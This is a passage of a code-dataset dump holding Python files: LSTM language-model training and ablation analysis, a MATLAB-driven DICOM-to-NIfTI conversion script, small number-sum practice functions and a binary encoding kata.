x.size())\nprint('Args:', args)\nprint('Model total parameters:', total_params)\n\n###############################################################################\n# Training code\n###############################################################################\n\ndef evaluate(data_source, batch_size=10):\n # Turn on evaluation mode which disables dropout.\n model.eval()\n #with torch.no_grad():\n if args.model == 'QRNN': model.reset()\n total_loss = 0\n ntokens = len(corpus.dictionary)\n hidden = model.init_hidden(batch_size)\n for i in range(0, data_source.size(0) - 1, args.bptt):\n data, targets = get_batch(data_source, i, args, evaluation=True)\n output, hidden = model(data, hidden)\n total_loss += len(data) * criterion(model.decoder.weight, model.decoder.bias, output, targets).data\n hidden = repackage_hidden(hidden)\n return total_loss.item() / len(data_source)\n\ndef evaluate_copy(data_source, batch_size=10):\n # Turn on evaluation 
mode which disables dropout. \n \n model_copy.eval()\n\n if args.model == 'QRNN': model_copy.reset()\n total_loss = 0\n ntokens = len(corpus.dictionary)\n hidden = model_copy.init_hidden(batch_size)\n for i in range(0, data_source.size(0) - 1, args.bptt):\n data, targets = get_batch(data_source, i, args, evaluation=True)\n output, hidden = model_copy(data, hidden)\n total_loss += len(data) * criterion(model_copy.decoder.weight, model_copy.decoder.bias, output, targets).data\n hidden = repackage_hidden(hidden)\n return total_loss.item() / len(data_source)\n\ndef eval_hig_low_fre(data_source, batch_size=10):\n # Turn on evaluation mode which disables dropout. \n model.eval()\n #with torch.no_grad(): \n \n if args.model == 'QRNN': model.reset()\n total_loss = 0\n ntokens = len(corpus.dictionary)\n hidden = model.init_hidden(batch_size)\n for i in range(0, data_source.size(0) - 1, args.bptt):\n data, targets = get_batch(data_source, i, args, evaluation=True)\n output, hidden = model(data, hidden)\n total_loss += len(data) * criterion(model.decoder.weight, model.decoder.bias, output, targets).data\n hidden = repackage_hidden(hidden)\n return total_loss.item() / len(data_source)\n\ndef train():\n # Turn on training mode which enables dropout.\n if args.model == 'QRNN': model.reset()\n total_loss = 0\n start_time = time.time()\n ntokens = len(corpus.dictionary)\n hidden = model.init_hidden(args.batch_size)\n batch, i = 0, 0\n while i < train_data.size(0) - 1 - 1:\n bptt = args.bptt if np.random.random() < 0.95 else args.bptt / 2.\n # Prevent excessively small or negative sequence lengths\n seq_len = max(5, int(np.random.normal(bptt, 5)))\n # There's a very small chance that it could select a very long sequence length resulting in OOM\n # seq_len = min(seq_len, args.bptt + 10)\n\n lr2 = optimizer.param_groups[0]['lr']\n optimizer.param_groups[0]['lr'] = lr2 * seq_len / args.bptt\n model.train()\n data, targets = get_batch(train_data, i, args, seq_len=seq_len)\n\n # Starting each batch, we detach the hidden state from how it was previously produced.\n # If we didn't, the model would try backpropagating all the way to start of the dataset.\n hidden = repackage_hidden(hidden)\n optimizer.zero_grad()\n\n output, hidden, rnn_hs, dropped_rnn_hs = model(data, hidden, return_h=True)\n raw_loss = criterion(model.decoder.weight, model.decoder.bias, output, targets)\n\n loss = raw_loss\n # Activiation Regularization\n if args.alpha: loss = loss + sum(args.alpha * dropped_rnn_h.pow(2).mean() for dropped_rnn_h in dropped_rnn_hs[-1:])\n # Temporal Activation Regularization (slowness)\n if args.beta: loss = loss + sum(args.beta * (rnn_h[1:] - rnn_h[:-1]).pow(2).mean() for rnn_h in rnn_hs[-1:])\n loss.backward()\n\n # `clip_grad_norm` helps prevent the exploding gradient problem in RNNs / LSTMs.\n if args.clip: torch.nn.utils.clip_grad_norm_(params, args.clip)\n optimizer.step()\n \n # added by shivi to keep reassigning the bias values\n #dict_param = dict(model.named_parameters())\n\n total_loss += raw_loss.data\n optimizer.param_groups[0]['lr'] = lr2\n if batch % args.log_interval == 0 and batch > 0:\n cur_loss = total_loss.item() / args.log_interval\n elapsed = time.time() - start_time\n print('| epoch {:3d} | {:5d}/{:5d} batches | lr {:05.5f} | ms/batch {:5.2f} | '\n 'loss {:5.2f} | ppl {:8.2f} | bpc {:8.3f}'.format(\n epoch, batch, len(train_data) // args.bptt, optimizer.param_groups[0]['lr'],\n elapsed * 1000 / args.log_interval, cur_loss, math.exp(cur_loss), cur_loss / math.log(2)))\n total_loss = 0\n 
start_time = time.time()\n ###\n batch += 1\n i += seq_len\n #added by shivi\n torch.cuda.empty_cache()\n\n# Loop over epochs.\nlr = args.lr\nbest_val_loss = []\nstored_loss = 100000000\nval_loss_array = []\n## Storing bias values along iterations\nlayer_fb = [ [ ] for l in range(args.nlayers)]\nprint('Should be a list of three empty list', layer_fb)\n# At any point you can hit Ctrl + C to break out of training early.\ntry:\n optimizer = None\n # Ensure the optimizer is optimizing params, which includes both the model's weights as well as the criterion's weight (i.e. Adaptive Softmax)\n if args.optimizer == 'sgd':\n optimizer = torch.optim.SGD(params, lr=args.lr, weight_decay=args.wdecay)\n if args.optimizer == 'adam':\n optimizer = torch.optim.Adam(params, lr=args.lr, weight_decay=args.wdecay)\n for epoch in range(1, args.epochs+1):\n epoch_start_time = time.time()\n train()\n torch.cuda.empty_cache()\n print('Epochs',epoch)\n print('used memory before',torch.cuda.memory_allocated()/1e9)\n print('cached memory beforec',torch.cuda.memory_cached()/1e9)\n \n if 't0' in optimizer.param_groups[0]:\n\n print(\"'\"*89)\n \n l1 = dict(model.named_parameters())\n l2 = dict(model_copy.named_parameters())\n \n for prm_name in l1.keys():\n try: \n l2[prm_name].data = optimizer.state_dict()['state'][id(l1[prm_name])]['ax'] \n except:\n l2[prm_name].data = l1[prm_name].data\n \n \n val_loss2 = evaluate_copy(val_data)\n print('-' * 89)\n print('| end of epoch {:3d} | time: {:5.2f}s | valid loss {:5.2f} | '\n 'valid ppl {:8.2f} | valid bpc {:8.3f}'.format(\n epoch, (time.time() - epoch_start_time), val_loss2, math.exp(val_loss2), val_loss2 / math.log(2)))\n print('-' * 89)\n val_loss_array.append(val_loss2)\n if val_loss2 < stored_loss:\n model_copy_save(args.save)\n print('Saving Averaged!')\n stored_loss = val_loss2\n \n torch.cuda.empty_cache()\n print('used memory after',torch.cuda.memory_allocated()/1e9)\n print('cached memory after',torch.cuda.memory_cached()/1e9)\n\n else:\n val_loss = evaluate(val_data, eval_batch_size)\n print('-' * 89)\n print('| end of epoch {:3d} | time: {:5.2f}s | valid loss {:5.2f} | '\n 'valid ppl {:8.2f} | valid bpc {:8.3f}'.format(\n epoch, (time.time() - epoch_start_time), val_loss, math.exp(val_loss), val_loss / math.log(2)))\n print('-' * 89)\n val_loss_array.append(val_loss)\n if val_loss < stored_loss:\n model_save(args.save)\n print('Saving model (new best validation)')\n stored_loss = val_loss\n\n if args.optimizer == 'sgd' and 't0' not in optimizer.param_groups[0] and (len(best_val_loss)>args.nonmono and val_loss > min(best_val_loss[:-args.nonmono])):\n print('Switching to ASGD')\n optimizer = torch.optim.ASGD(model.parameters(), lr=args.lr, t0=0, lambd=0., weight_decay=args.wdecay)\n\n if epoch in args.when:\n print('Saving model before learning rate decreased')\n model_save('{}.e{}'.format(args.save, epoch))\n print('Dividing learning rate by 10')\n optimizer.param_groups[0]['lr'] /= 10.\n\n best_val_loss.append(val_loss)\n\nexcept KeyboardInterrupt:\n print('-=' * 89)\n print('Exiting from training early')\n\nif False: \n \n model_name = args.save.split('.')[0]\n plt.figure();\n plt.plot(val_loss_array);\n plt.axhline(y=stored_loss, color='r', linestyle='-');\n plt.savefig(model_name+'_val_loss_training.png')\n \n model_load(args.save)\n \n # Run on test data. 
\n test_loss = evaluate(test_data, test_batch_size) \n print('=' * 89) \n print('| End of training | test loss {:5.2f} | test ppl {:8.2f} | test bpc {:8.3f}'.format( \n test_loss, math.exp(test_loss), test_loss / math.log(2))) \n print('=' * 89) \n \n\n dict_param = dict(model.named_parameters()) \n hid_dim = [1150,1150,400] \n \n\n for l in range(3): \n x = (dict_param['rnns.'+str(l)+'.module.bias_ih_l0'].data[0:hid_dim[l]*2].cpu() + dict_param['rnns.'+str(l)+'.module.bias_hh_l0'].data[0:hid_dim[l]*2].cpu()) \n #-----------------------------------------------------------------------------------------------------------------\n #print('Forget gate initialization values for layer',l,'is', math.log( (Tmax/(2**(2-l)))-1))\n print('Expected random values')\n print('Input gates bias after training',x[0:hid_dim[l]])\n \n first_mod = int(0.8*hid_dim[l]); second_mod = int(0.1*hid_dim[l])+first_mod; third_mod = int(0.1*hid_dim[l])+second_mod;\n print('Expected values from ',np.log(1),'to',np.log(19))\n print('Forget gates bias after training',x[hid_dim[l]:hid_dim[l]+first_mod])\n\n print('Expected values',np.log(69))\n print('Forget gates bias after training',x[hid_dim[l]+first_mod:hid_dim[l]+second_mod])\n \n print('Expected values',10**8)\n print('Forget gates bias after training',x[hid_dim[l]+second_mod:hid_dim[l]+third_mod])\n \n #------------------------------------------------------------------------------------------------------------------\n\n plt.figure(); plt.plot(np.sort(x[hid_dim[l]:hid_dim[l]*2])); \n plt.xlabel('Hidden units in sorted order'); plt.ylabel('Forget gate bias values of hidden unit') \n plt.savefig('Custom_fg_bias_modular_layer_'+str(l+1)+str(Tmax)+'.png')\n #------------------------------------------------------------------------------------------------------------------\n\n#exit(0)\n\n#Perform model ablation, remove one word in one position, get the output hidden/cell state , compare with original, write in an array at position index\n \ncos = nn.CosineSimilarity(dim=1, eps=1e-6)\ndiff_arr = np.zeros(71)\ndiff_arr_fl = np.zeros(71)\ndiff_arr_sl = np.zeros(71)\ndiff_arr_tl = np.zeros(71)\nl2norm = nn.PairwiseDistance(p=2)\n\ndef model_ablation(data_source, batch_size=10):\n # Turn on evaluation mode which disables dropout. 
\n diff_arr = np.zeros(71); diff_arr_fl = np.zeros(71); diff_arr_sl = np.zeros(71); diff_arr_tl = np.zeros(71)\n cell_state_fl = []; cell_state_sl = []; cell_state_tl = []; hidden_store = []\n dist_arr = np.zeros(args.bptt); count = 0\n\n model.eval()\n if args.model == 'QRNN': model.reset()\n total_loss = 0\n ntokens = len(corpus.dictionary)\n hidden = model.init_hidden(args.bptt+1) \n \n for i in range(0, data_source.size(0) - 1, args.bptt):\n data, targets = get_batch(data_source, i, args, evaluation=True)\n if data.shape[0] != args.bptt:\n print(data.shape[0])\n continue \n x = data.cpu().detach().numpy()\n y = np.repeat(x,args.bptt+1,axis=1)\n z = np.arange(1,71)\n data_batch_org = torch.tensor(y).cuda()\n \n y[z-1,np.flip(z)] = UNK_ind\n data_batch = torch.tensor(y).cuda()\n \n #print((data_batch))\n #exit(0)\n output, h = model(data_batch, hidden)\n o, hidden = model(data_batch_org, hidden)\n\n first_layer_cell = torch.squeeze(h[0][1],dim=0)\n second_layer_cell= torch.squeeze(h[1][1],dim=0)\n third_layer_cell = torch.squeeze(h[2][1],dim=0)\n \n gt_cs_fl = first_layer_cell[0,:].unsqueeze_(0)\n gt_cs_sl = second_layer_cell[0,:].unsqueeze_(0)\n gt_cs_tl = third_layer_cell[0,:].unsqueeze_(0)\n \n diff_fl = l2norm(first_layer_cell, gt_cs_fl) /torch.norm(gt_cs_fl).item()\n\n if True:\n diff_sl = l2norm(second_layer_cell, gt_cs_sl) / torch.norm(gt_cs_sl).item()\n else: \n first_mod = int(0.8*hid_dim) \n diff_sl = l2norm(second_layer_cell[:first_mod], gt_cs_sl[:first_mod]) / l2norm(gt_cs_sl[:first_mod]) \n diff_sl = l2norm(second_layer_cell[first_mod:], gt_cs_sl[first_mod:]) / l2norm( gt_cs_sl[first_mod:])\n\n #check whether normalized or not\n diff_tl = l2norm(third_layer_cell, gt_cs_tl) / torch.norm(gt_cs_tl).item() \n \n diff_arr_fl += diff_fl.cpu().detach().numpy() \n diff_arr_sl += diff_sl.cpu().detach().numpy()\n diff_arr_tl += diff_tl.cpu().detach().numpy()\n \n \n hidden = repackage_hidden(hidden) \n count +=1\n\n diff_arr_fl /= float(count); diff_arr_sl /= float(count); diff_arr_tl /= float(count);\n \n return [diff_arr_fl[1:],diff_arr_sl[1:],diff_arr_tl[1:] ] #total_loss.item() / len(data_source) \n\n\nfrom scipy.optimize import curve_fit\ndef linf(x, A, B, C): # this is your 'straight line' y=f(x) for straight line make B = 1 \n return A*(x**B) + C\n\ndef expf(x, a, b, c):\n return a * np.exp(-b * x) + c\n\ndef explinf(x, a, b, c,d):\n return a * np.exp(-b * x) + c*(x**(d)) \n\nfrom lmfit import Model\ngmodel = Model(explinf)\nexpmodel = Model(expf)\nlinmodel = Model(linf)\n\nimport math\ndef sigmoid(x):\n return 1 / (1 + math.exp(-x))\nimport statistics\nfrom sklearn.metrics import mean_squared_error\ndef plotting_model_ablation():\n \n model_name = ['PTB_1000_epochs.pt', 'PTB_l1_3_4_l2_pareto.pt','PTB_modular_80_20.pt'] #'PTB_custom_grad20_fix70.pt'\n piclab = ['Baseline','Pareto','Mod80'] \n \n fig3, axs3 = plt.subplots(1, 3, figsize=(10, 4), sharey=True)\n \n for i in range(len(model_name)):\n ##load model\n try: cci.download_to_file('shivangi/'+ model_name[i], model_name[i])\n except: print('Not in file format', model_name[i])\n model_load(model_name[i])\n\n ###################################################################################\n #print model performance\n if False:\n print('Model is',model_name[i])\n test_loss = evaluate(test_data, test_batch_size)\n print('=' * 89)\n print('| End of training | test loss {:5.2f} | test ppl {:8.2f} | test bpc {:8.3f}'.format(\n test_loss, math.exp(test_loss), test_loss / math.log(2)))\n print('=' * 89)\n \n #add MI plot on 
curves\n MI_path = ('/home/shivangi/lstm-timescales/mutual_information/MI_results_PTB_01.npz')\n mi_data = np.load(MI_path, allow_pickle=True)\n mi, var_mi = mi_data['all_MI']\n shuf_mi, var_shuf_mi = mi_data['shuff_MI']\n distance = np.arange(1, 101)\n MI = mi - shuf_mi\n ##################################################################################\n #load ablation arrays \n fig1, axs1 = plt.subplots(1, 3, figsize=(10, 4), sharey=True)\n fig2, axs2 = plt.subplots(1, 3, figsize=(10, 4), sharey=True)\n\n arr_name = 'diff_arr_all_'+model_name[i].split('.')[0]\n try: \n diff_arr_all = cci.download_npy_array(arr_name)\n print('Downloaded from CC')\n except: \n print('Running ablation and saving array') \n diff_arr_all = model_ablation(test_data, test_batch_size)\n cci.upload_npy_array(arr_name,diff_arr_all) \n\n print('Model is',model_name[i])\n for j in range(len(diff_arr_all)):\n print('Layer is ',j )\n diff_arr = diff_arr_all[j]\n ax1 = axs1[j]; ax2 = axs2[j] ; ax3 = axs3[j] ;\n \n semi_log = True; log_log=True\n if semi_log: \n ax3.plot((np.arange(1,len(diff_arr)+1)),(diff_arr), label = piclab[i]);\n ax3.set_ylabel('L2 norm btw cell states'); ax3.set_xlabel('Ablated word pos')\n ax3.set_title('For LSTM layer '+str(j+1))\n ax3.legend(loc='upper right')\n ax3.set_yscale('log');\n if log_log:\n ax1.plot((np.arange(1,len(diff_arr)+1)),(diff_arr), label = piclab[i]);\n ax1.plot((np.arange(1,len(diff_arr)+1)),(MI[:len(diff_arr)]), label = 'MI_PTB');\n ax1.set_ylabel('L2 norm btw cell states'); ax1.set_xlabel('Ablated word pos')\n #ax1.set_yscale('log'); ax1.set_xscale('log')\n \n\n #Plot slope of curve fit to log-log graph\n x,y = (np.arange(1,len(diff_arr)+1)), (diff_arr) \n \n #coeff of exp and poly are init to constant\n a,c = 0.1,1\n # grid search values for b and d\n bd_list = [(b,d) for b in np.arange(0.1,1.5,0.1) for d in np.arange(-1,1,0.1)]\n h = defaultdict(dict)\n mse = []\n combined_model = True\n separate = False\n if combined_model:\n for count, (b,d) in enumerate(bd_list):\n params = gmodel.make_params()\n params.add('a',value=a, min=0)\n params.add('c',value=c, min=0)\n params.add('b',value=b)\n params.add('d',value=d)\n\n try:\n result = gmodel.fit(y, params, x=x) \n [a,b,c,d] = [result.params['a'].value, result.params['b'].value, result.params['c'].value, result.params['d'].value]\n if j not in h[i]: h[i][j] = {}\n \n mse.append(mean_squared_error(y, explinf(x, a,b,c,d)))\n \n h[i][j][count] = [(round(a,2),round(b,2),round(c,2),round(d,2))]\n \n except:\n continue\n \n #retreive opt a,b,c,d by taking arg min ove mse lsit\n (a_opt,b_opt,c_opt,d_opt) = h[i][j][np.argmin(np.array(mse))][0]\n ax1.plot(x,explinf(x, a_opt,b_opt,c_opt,d_opt),'m--',label = 'both')\n ax1.plot(x,explinf(x, a_opt,b_opt,0,0),'k--',label = 'expo only') \n ax1.plot(x,explinf(x, 0, 0, c_opt,d_opt),'r--',label = 'poly only')\n ax1.set_ylim([0.01 , 1])\n ax2.plot(mse)\n \n elif separate: \n paramse = expmodel.make_params( a=a, b=b, c=0.25)\n resulte = expmodel.fit(y, paramse,x=x)\n [a,b,c] = [resulte.params['a'].value, resulte.params['b'].value, resulte.params['c'].value]\n print('Coeffs of exp',a,b,c)\n ax1.plot(x,expf(x, a,b,c),'k--',label = 'expo')\n \n \n params = linmodel.make_params( A=c, B=d, C=0.25)\n result = linmodel.fit(y, params, x=x)\n [A,B,C] = [result.params['A'].value, result.params['B'].value, result.params['C'].value]\n print('Coeffs of lin',A,B,C)\n ax1.plot(x,linf(x,A,B,C),'r--',label = 'poly')\n\n\n ax1.set_title('For LSTM layer '+str(j+1))\n ax1.legend(loc='lower left')\n 
ax1.set_yscale('log'); ax1.set_xscale('log') \n\n #if (j==len(model_name)-1):\n for ax in axs1.flat: \n ax.label_outer()\n for ax in axs2.flat:\n ax.label_outer()\n \n \n fig1.savefig('Log_diff_log_x_0216_combined_'+model_name[i].split('.')[0]+'_'+str(round(b,2))+'_'+str(round(d,2))+'.png')\n fig2.savefig('MSE_0207_'+model_name[i].split('.')[0])\n \n for ax in axs3.flat:\n ax.label_outer()\n fig3.savefig('Log_diff_x_0216_top_3.png')\n\nplotting_model_ablation()\n\n## Plotting forget bias values initial vs final for Chrono-grad\ndef plotting_grad_bias():\n model_name = ['PTB_asgd_grad_tmax_20.pt' , 'PTB_asgd_grad_tmax_70.pt', 'PTB_asgd_grad_tmax_200.pt' ]\n piclab = ['g20','g70','g200']\n Tmin = 1; Tmax_l = [20, 70, 200]\n hid_dim = [1150,1150,400]\n \n for i in range(3):\n model_load(model_name[i])\n Tmax = Tmax_l[i]\n dict_param = dict(model.named_parameters())\n \n for l in range(3):\n diff = (Tmax - 1 - Tmin)\n forget_gate_bias_bfore_training = np.log(Tmin + ( (diff*np.arange(hid_dim[l])) / (hid_dim[l]-1) ) )\n forget_gate_bias_after_training = (dict_param['rnns.'+str(l)+'.module.bias_ih_l0'].data[hid_dim[l]:hid_dim[l]*2].cpu() + dict_param['rnns.'+str(l)+'.module.bias_hh_l0'].data[hid_dim[l]:hid_dim[l]*2].cpu())\n\n plt.figure(l+1); plt.plot(forget_gate_bias_bfore_training,forget_gate_bias_after_training,label='g'+str(Tmax))\n plt.axis([0, 6 , -5 ,5])\n plt.xlabel('Forget gate bias initialization'); plt.ylabel('Forget gate bias after training')\n plt.title('Bias values for layer '+str(l+1))\n\n for l in range(3):\n plt.figure(l+1);plt.legend(loc='upper left'); \n plt.savefig('Grad_model_forget_bias_hidden_'+str(l+1)+'.png') \n \n#plotting_grad_bias()\n\ndef plotting_fix_bias():\n ## Plotting cosine distance between hidden/cell state for fixed models \n #model_name = ['PTB_asgd_orig.pt', 'PTB_fixed_tmax_20_nograd.pt', 'PTB_fixed_tmax_70_nograd.pt','PTB_fixed_tmax_200_nograd.pt']\n\n #model_name = ['PTB_asgd_orig.pt' ,'PTB_asgd_fixed_tmax_20.pt', 'PTB_asgd_fixed_tmax_70.pt', 'PTB_asgd_fixed_tmax_200.pt' ]\n #piclab = ['orig','f20','f70','f200']\n #piclab_in = ['orig_init','f20_init','f70_init','f200_init']\n \n #model_name = ['PTB_1000_epochs.pt','PTB_custom_20.pt', 'PTB_custom_70.pt','PTB_custom_grad20_fix70.pt']\n #piclab = ['orig','T20','T70','modular']\n\n model_name = ['PTB_1000_epochs.pt','PTB_custom_5.pt', 'PTB_custom_10.pt','PTB_custom_20.pt','PTB_custom_30.pt','PTB_custom_70.pt','PTB_custom_grad20_fix70.pt','PTB_modular_80_20.pt']\n piclab = ['orig_1k','T5','T10','T20','T30','T70','Mod5','Mod8']\n\n\n hid_dim = [1150,1150,400]\n #Tmax_l = [10, 20,70,200]\n\n for i in range(len(model_name)):\n model_load(model_name[i])\n #fixed_bias = np.log([Tmax_l[i]-1,Tmax_l[i]/2-1,Tmax_l[i]/4-1])\n dict_param = dict(model.named_parameters())\n \n for l in range(2,3):\n #forget_gate_bias_bfore_training = fixed_bias[l]*np.ones(hid_dim[l]) \n forget_gate_bias_after_training = (dict_param['rnns.'+str(l)+'.module.bias_ih_l0'].data[hid_dim[l]:hid_dim[l]*2].cpu() + dict_param['rnns.'+str(l)+'.module.bias_hh_l0'].data[hid_dim[l]:hid_dim[l]*2].cpu())\n #forget_gate_bias_sorted = np.cumsum(np.sort(forget_gate_bias_after_training))\n \n plt.figure(l+1); \n plt.plot(np.sort(forget_gate_bias_after_training),label=piclab[i])\n #plt.plot(forget_gate_bias_bfore_training,label=piclab_in[i])\n plt.xlabel('Hidden units'); plt.ylabel('Forget gate bias (sorted)')\n plt.title('Forget gate bias after training for layer '+str(l+1))\n\n for l in range(2,3):\n plt.figure(l+1);plt.legend(loc='upper left');\n 
plt.savefig('Custom_fg_bias_fixed_'+str(l+1)+'.png')\n #plt.savefig('Fixed_model_nograd_bias_bf_af_'+str(l+1)+'.png')\n\n#plotting_fix_bias()\n\n\n#1. Distribution plot: hidden units vs. old/new value\n#2. Cell state visualization as a heat map (for units vs. ablated positions) (seaboard - look at Shailee’s notebook)\n#3. Distance vs. position plot: ylim same across layers - get code from Shailee for subplots!\n","repo_name":"shivangi-mahto/brain_teaser","sub_path":"util_functions.py","file_name":"util_functions.py","file_ext":"py","file_size_in_byte":34735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70020063121","text":"\"\"\"Nii conversion with matlab, currently preferred version.\"\"\"\n#%%\nimport shutil\nimport os\nfrom os.path import join, split\nfrom pathlib import Path\nimport json\nimport pickle\nfrom utilities.basic import list_subdir, move_compress, remove_files\nimport matlab.engine\nimport numpy as np\nimport warnings\n\n\n# paths\nscript_dir = os.path.realpath(__file__)\nbase_dir = Path(script_dir).parent\ntables_dir = join(base_dir, 'data', 'tables')\ndisk_data_dir = join(\"F:\\\\\", 'CoBra', 'Data')\ntgt_dir = join(disk_data_dir, 'volume_cross_nii', 'input', 'nii_files')\ntmp_dir = join(disk_data_dir, 'volume_cross_nii', 'temp')\n#excl_files_dir = join(tmp_dir, 'spm_conv_error', 'cut_off')\nexcl_files_dir = [join(disk_data_dir, 'volume_longitudinal_nii', 'input', 'nii_files'), \n join(disk_data_dir, 'volume_cross_nii', 'input', 'nii_files'),\n join(disk_data_dir, 'volume_cross_nii', 'temp', 'dcm2nii_conv_error','corrupted'),\n join(disk_data_dir, 'volume_cross_nii', 'temp', 'spm_conv_error','corrupted'),\n join(disk_data_dir, 'volume_cross_nii', 'input', 'seg_failed'),\n join(disk_data_dir, 'volume_cross_nii', 'input','nii_files', 'segmented'),\n join(disk_data_dir, 'volume_longitudinal_nii', 'input', 'nii_files','segmented'),\n ]\ndata_dir = join(base_dir, 'data')\ndata_cross_dir = join(data_dir, 't1_cross')\ndata_long_dir = join(data_dir, 't1_longitudinal')\n# matlab engine\neng = matlab.engine.start_matlab()\neng.addpath('C:\\\\Users\\\\kiril\\\\Thesis\\\\CoBra\\\\cobra\\\\dcm2nii\\\\dcm2nii_mat\\\\functions', nargout=0)\neng.addpath('C:\\\\Users\\\\kiril\\\\Thesis\\\\CoBra\\\\cobra\\\\dcm2nii\\\\dcm2nii_mat\\\\dcm2nii')\neng.addpath('C:\\\\Users\\\\kiril\\\\Thesis\\\\CoBra\\\\cobra\\\\dcm2nii\\\\dcm2nii_mat\\\\spm12')\n# load necessary files\nwith open(join(tables_dir, 'newIDs_dic.pkl'), 'rb') as f:\n id_dic = pickle.load(f)\nwith open(join(data_dir,'patient_groups', \"3dt1_sids.pkl\"), 'rb') as f:\n sids_ls = pickle.load(f)\nwith open(join(tables_dir, \"disk_series_directories.json\"), 'rb') as f:\n dir_dic = json.load(f)\ndownloaded_sids = np.loadtxt(join(disk_data_dir,'dcm', 'volume_log.txt'), dtype=str).tolist()\n\nsids_ls = list(set(sids_ls).intersection(set(downloaded_sids)))\nwarnings.warn(\"Don't forget to update volume_dir_dic\")\nprint('Take only sids that are in volume_dir_dic')\nsids_ls = list(set(sids_ls).intersection(set(dir_dic.keys())))\n\n# define functions\ndef get_missing_files(sids_to_conv, nii_dir, newid_dic, excl_nii_dir=None):\n \"\"\"\n sids_to_conv: List of SeriesInstanceUIDs that need to be converted to nii\n nii_dir: str, directory where converted files are placed\n newid_dic: dictionary used to map sids to 6 digit new ids\n returns: list of missing files sids\n \"\"\"\n inv_map = {v: k for k, v in newid_dic.items()}\n print(nii_dir)\n conv_files_ids = [file[:-7] for file in 
os.listdir(nii_dir) if file.endswith('.nii.gz')]\n print(conv_files_ids)\n conv_files_sids = [inv_map[id] for id in conv_files_ids]\n if not isinstance(excl_nii_dir, type(None)):\n print('exclude files in', excl_nii_dir)\n if isinstance(excl_nii_dir, list):\n excl_files_sids = []\n for dir_ in excl_nii_dir:\n excl_files_ids = [file[:-7] for file in os.listdir(dir_) if file.endswith('.nii.gz')]\n excl_files_sids_temp = [inv_map[id] for id in excl_files_ids]\n excl_files_sids = excl_files_sids + excl_files_sids_temp\n else:\n excl_files_ids = [file[:-7] for file in os.listdir(excl_nii_dir) if file.endswith('.nii.gz')]\n excl_files_sids = [inv_map[id] for id in excl_files_ids]\n missing_files = (set(sids_to_conv).difference(set(conv_files_sids))).difference(set(excl_files_sids))\n return list(missing_files)\n\n\ndef dcm2nii_mat(src_dir, tgt_path, tmp_dir, test=False):\n \"\"\"Converts dcm to nii using dcm2nii (matlab) or spm12 (matlab) if first fails\n src_dir: Directory with dcm series\n tgt_path: Full path of the nii file that will be produced (should end with .nii.gz)\"\"\"\n \n try:\n eng.spm12_main(src_dir, tmp_dir)\n except:\n # sometimes .nii files are produced that look reasonable\n # rename them and keep them in these folder\n nii_files = list_subdir(tmp_dir, '.nii')\n if len(nii_files)==1:\n move_compress(nii_files[0], join(tmp_dir, 'spm_conv_error', split(tgt_path)[1]), True)\n remove_files(tmp_dir, ending='.nii.gz')\n remove_files(tmp_dir, ending='.nii')\n print(\"spm failed, try dcm2nii\")\n try:\n eng.dcm2nii_main(src_dir, tmp_dir)\n except:\n nii_files = list_subdir(tmp_dir, '.nii')\n if len(nii_files)==1:\n shutil.move(nii_files[0], join(tmp_dir, 'dcm2nii_conv_error', split(tgt_path)[1][:-3]))\n remove_files(tmp_dir, ending='.nii.gz')\n remove_files(tmp_dir, ending='.nii')\n print('x')\n out_files = list_subdir(tmp_dir, ending='.nii.gz')\n if len(out_files)==0:\n pass\n elif len(out_files)==1:\n shutil.move(out_files[0], tgt_path)\n else:\n for out_file in out_files:\n shutil.move(out_file, join(tmp_dir, 'dcm2nii_conv_error', split(tgt_path)[1]))\n return 0\ndef dcm2nii_mat_main(sids_ls, id_dic, tmp_dir, tgt_dir, excl_files_dir=None, test=False):\n \"\"\"sids_ls: List of sids that need to be converted\"\"\"\n missing_files = get_missing_files(sids_ls, tgt_dir, id_dic, excl_files_dir)\n print(len(missing_files), ' files will be converted')\n if test:\n missing_files = missing_files[:3]\n sids = [split(f)[1] for f in missing_files]\n tgt_paths = [join(tgt_dir, id_dic[sid]+'.nii.gz') for sid in sids]\n src_dirs = [dir_dic[sid] for sid in sids]\n mp_input = [(src_dir, tgt_path) for src_dir, tgt_path in zip(src_dirs, tgt_paths)]\n for src_dir, tgt_path in mp_input:\n dcm2nii_mat(src_dir, tgt_path, tmp_dir)\n \nif __name__ == '__main__':\n dcm2nii_mat_main(sids_ls, id_dic, tmp_dir, tgt_dir, excl_files_dir, test=False)","repo_name":"kirilklein/CoBra","sub_path":"cobra/conv_mat_move_files_for_pred.py","file_name":"conv_mat_move_files_for_pred.py","file_ext":"py","file_size_in_byte":5976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38020926018","text":"# Find 2 numbers that sum target\ndef find2NumsSum(array, target):\n i = 0\n dict_sums = {}\n sln = []\n while i < len(array):\n if array[i] not in dict_sums.values():\n dict_sums[array[i]] = target - array[i]\n else: \n sln.append([ array[i], target - array[i] ]) \n i += 1\n return(sln)\n\n\n\n# Find 3 numbers that sum target\ndef find3Numbers(array, target): \n arr_size = 
len(array)\n \n for i in range(0, arr_size-1): \n # Find pair in subarray A[i + 1..n-1] \n # with sum equal to sum - A[i] \n s = set() \n curr_sum = target - array[i] \n for j in range(i + 1, arr_size): \n if (curr_sum - array[j]) in s: \n print(\"Triplet is\", array[i], \n \", \", array[j], \", \", curr_sum-array[j]) \n return True\n s.add(array[j]) \n print(s)\n \n return False\n \n\n# Find 4 numbers that sum target\ndef find4NumsSum(array, target):\n pass\n\n\n\n\narray2 = [1,2,3,4,5,6,7,8] \n# print(find2NumsSum(array2, 9))\n\nprint(find3Numbers(array2, 13))","repo_name":"johanaluna/Code_Interviews","sub_path":"AlgoExpert/FindX_NumSum.py","file_name":"FindX_NumSum.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"295174266","text":"# https://www.codewars.com/kata/5d98b6b38b0f6c001a461198/train/python\n\ndef code(strng):\n result = \"\"\n for c in strng:\n digit = ord(c)-ord(\"0\")\n binary = format(f\"{digit:b}\")\n k = len(binary)\n result += \"\".join([\"0\"]*(k-1)) + \"1\" + binary\n return result\n \ndef decode(strng):\n current = 0\n i = strng.find(\"1\",current)\n result = \"\"\n while i >= 0 :\n k = i-current + 1\n current = i+1\n binary = strng[current:current+k]\n digit = int(binary,2)\n result += str(digit)\n current += k\n i = strng.find(\"1\",current)\n return 